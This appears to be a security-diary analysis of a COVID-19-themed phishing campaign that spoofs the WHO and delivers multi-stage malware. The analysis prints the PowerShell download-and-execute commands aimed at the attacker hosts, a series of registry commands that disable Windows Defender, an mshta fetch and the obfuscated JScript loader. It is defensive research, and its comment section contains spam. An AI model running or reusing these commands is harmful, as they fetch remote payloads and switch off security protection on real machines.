COVID-19 Themed Multistage Malware
More and more countries are closing their borders and ask citizens to stay at home. The COVID-19 virus is everywhere and also used in campaigns to lure more victims who are looking for information about the pandemic. I found a malicious email that delivers a multi-stage malware.
It spoofs a World Health Organisation email and pretends to provide recommendations to the victim:
From: World Health Organisation <info@who.org> To: xxx Subject: CORONAVIRUS TRAVEL RECOMMENDATIONS Dear Sir / Madam, Following the vertiginous spread of the CORONAVIRUS epidemic, which has already left more than 4,200 people dead and 119,000 cases worldwide; we recommend these sanitary measures. Download these measures [1] Kind Regards, WORLD HEALTH ORGANIZATION Avenue Appia 20 1202 Geneva Swiss Phone: + 41-22-7912111 Links: ------ [1] hxxp://bit[.]ly/2W1eAvU
The shortened link redirects to an URL that serves a malicious Word document:
hxxp://216[.]189[.]145[.]11/RECOMMENDATIONS CORONAVIRUS.doc
(This IP is located in the US (a hosting company)
The downloaded document (SHA256:c3379e83cd3e8763f80010176905f147fcc126b5e7ad9faa585d5520386bd659) has a current VT score of 6/60[1]! The document does have any macro but has two embedded objects:
root@remnux:/malwarezoo# oledump.py “RECOMMENDATIONS CORONAVIRUS.doc” 1: 114 '\x01CompObj' 2: 280 '\x05DocumentSummaryInformation' 3: 416 '\x05SummaryInformation' 4: 7340 '1Table' 5: 5304 'Data' 6: O 26260 'ObjectPool/_1645425484/\x01Ole10Native' 7: 6 'ObjectPool/_1645425484/\x03ObjInfo' 8: O 26359 'ObjectPool/_1645425485/\x01Ole10Native' 9: 6 'ObjectPool/_1645425485/\x03ObjInfo' 10: 4096 'WordDocument'
The two embedded documents are the same and are DOS batch files (SHA256:c8aace2ca96c6e308f374f4b2e425849ca94287aa8ea9768c5a24b38a2167d24), unknown on VT.
When you look at the file, it is heavily obfuscated using Chinese characters:
This script is a downloader and grabs another script via Powershell:
powershell -WindowStyle Hidden -command "IEX (New-Object Net.WebClient).DownloadFile('hxxp://216[.]189[.]145[.]11/auto.cfg.bat', 'C:\Users\Public\Libraries\auto.cfg.bat');" C:\Users\Public\Libraries\auto.cfg.bat
The new script is obfuscated in the same way. Once launched, it perform the following actions:
It changes system registry keys to affect system security. Some example:
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
The script is also a downloader and grabs another stage via Powershell:
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHYAPwBnAHAAbAAxADkAMAA3ADIAMwAnACkA
The Powershell code is:
I.E.X. .(.N.e.w.-.O.b.j.e.c.t. .N.e.t...W.e.b.C.l.i.e.n.t.)...d.o.w.n.l.o.a.d.s.t.r.i.n.g.(.'.h.t.t.p.:././.v...b.d.d.p...n.e.t./.v.?.g.p.l.1.9.0.7.2.3.'.).
Unfortunately, this URL was not responding
Another stage is downloaded. This time, it’s a piece of Javascript code processed via mshta.exe:
mshta hxxp://GoogleChromeUpdater[.]twilightparadox[.]com:448/html
Here is a beautified version of the code:
<script language="JScript"> window.moveTo(-1337, -2019); window.blur(); window.resizeTo(2, 4); try { window.onerror = function(sMsg, sUrl, sLine) { return false; } window.onfocus = function() { window.blur(); } } catch (e){} function NOmOucjRaxBnHwMIf(gpkyaHkgGqh,iavlrtFGhy) { var SfYFsjixiguptptyv=''; while(iavlrtFGhy.length<gpkyaHkgGqh.length) { iavlrtFGhy+=iavlrtFGhy; } for(i=0+0-0;i<gpkyaHkgGqh.length;i+=(2+0-0)) { var TcnMXxJMlPhQpMlksnDx=String.fromCharCode(parseInt(gpkyaHkgGqh.substr(i,2+0-0),16+0-0)^iavlrtFGhy.charCodeAt(i/(2+0-0))); SfYFsjixiguptptyv=SfYFsjixiguptptyv+TcnMXxJMlPhQpMlksnDx; } return SfYFsjixiguptptyv; } var gXbDAuFXjxYTM="xGYBCFZPNUjKFwPBeiSAxSyettCzqjyFUJMjImpwDmpwlQqatTAgfCPGAQAFiCgaWUYREMMPMJYBkIygwmbEzDPpbAGbtlNPimLLk"; var ckTUCQboJKNoxRgH="ksYuHEQKKuHjHjfFWUCuWQZzzMDMYSJGvrcgEPiLSRVwqPelhmAJInYhMWUJjBrSbFSbnFnFjlOhpPsOTWDPApkTlNxwipMPTVtxBJBtwmtUIElEWCHjKI"; var rZyJSgQdCyJzu="CBgHEmtkzNEWPCDReDwdcjiSEQgFQiyfQWBaGtsSPZPMPYfqGBIBJbQrepPeewKgqWyEtkYeMJsRLCFRwFaZEYCtNOJkqvaQQ"; var sAshjBJYMdMIRSDamX="sQKCisvUKaeuAFbpkganpjeYMdVCduknkLCKKeOhxzFyFejCVCqRcGRGdedcXrnPxJGnrcHviAlGBfbVJXUWArpEpkOFOuwkyxnjUzrCjKjQ"; var vYbxosMmhxPzmH=[String.fromCharCode(gXbDAuFXjxYTM.length), String.fromCharCode(ckTUCQboJKNoxRgH.length), String.fromCharCode(rZyJSgQdCyJzu.length), String.fromCharCode(sAshjBJYMdMIRSDamX.length) ]; var tNInITnWOtBTh=this[vYbxosMmhxPzmH[0+0-0]+vYbxosMmhxPzmH[1+0-0]+vYbxosMmhxPzmH[2+0-0]+vYbxosMmhxPzmH[3+0-0]];tNInITnWOtBTh(NOmOucjRaxBnHwMIf('40093c4e363003611e0b3a6a3a166b154b531a3a2f3c 07741d1f267742150624752c1f373b320f04392307132d312207400d1621000e2b5a236e52600f203f1e420120094c2227553215094018373b2154022b0d1646670203123d6b251f1c37602c60202e34147d120429743e6f380b41480f0d1 [...Long string truncated...] 162c21390d1625753829001b45582d195e01220b4a20216e38341b1b457b6d3a622516272f2e176f1368377635010f3c63250c374a4d75445d20055d0f263f0158480a01350b3c52032f1d56032722461f6235080d16664f3634505a5162 d070a597e55494f27105d3d19554473120161073c054a4d67332c12247e341b1b246f3e0a402521176a0e14257e2e0b7e470d1a2b1a171620022a3b7a67381f0e277b221738264a09611e013e77350b102d18391c363b351c7d0700381b4 707f55623c03362b29046001025e74290b0537643d032c3b4c67022a','6hNnbdN9WFp3lRVn')); </script> <hta:application caption="no" windowState="minimize" showInTaskBar="no" scroll="no" navigable="no" /> <!-- -->
The Interesting part of the code is the way they obfuscate the ‘eval’ call:
var vYbxosMmhxPzmH=[String.fromCharCode(gXbDAuFXjxYTM.length), String.fromCharCode(ckTUCQboJKNoxRgH.length), String.fromCharCode(rZyJSgQdCyJzu.length), String.fromCharCode(sAshjBJYMdMIRSDamX.length) ];
They convert the length of each variable into a char:
String.fromCharCode(gXbDAuFXjxYTM.length) -> ‘e’
String.fromCharCode(ckTUCQboJKNoxRgH.length) -> ‘v’
...
In the function NOmOucjRaxBnHwMIf(), you can spot a ‘^’ operator that manipulates strings and decrypt the XOR’d code. SpiderMonkey is the perfect tool to decode the JavaScript:
root@remnux:/malwarezoo# js -f /usr/share/remnux/objects.js malicious.js
The script is very nicely obfuscated but, based on first analysis, it looks to be a bot performing POST request at a regular interval... I'll publish my findings about this script in my next diary!
Here is a first step: It exfiltrates data about the infected host:
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments
www
Nov 17th 2022
6 months ago
EEW
Nov 17th 2022
6 months ago
qwq
Nov 17th 2022
6 months ago
mashood
Nov 17th 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
6 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
isc.sans.edu
Dec 26th 2022
5 months ago
isc.sans.edu
Dec 26th 2022
5 months ago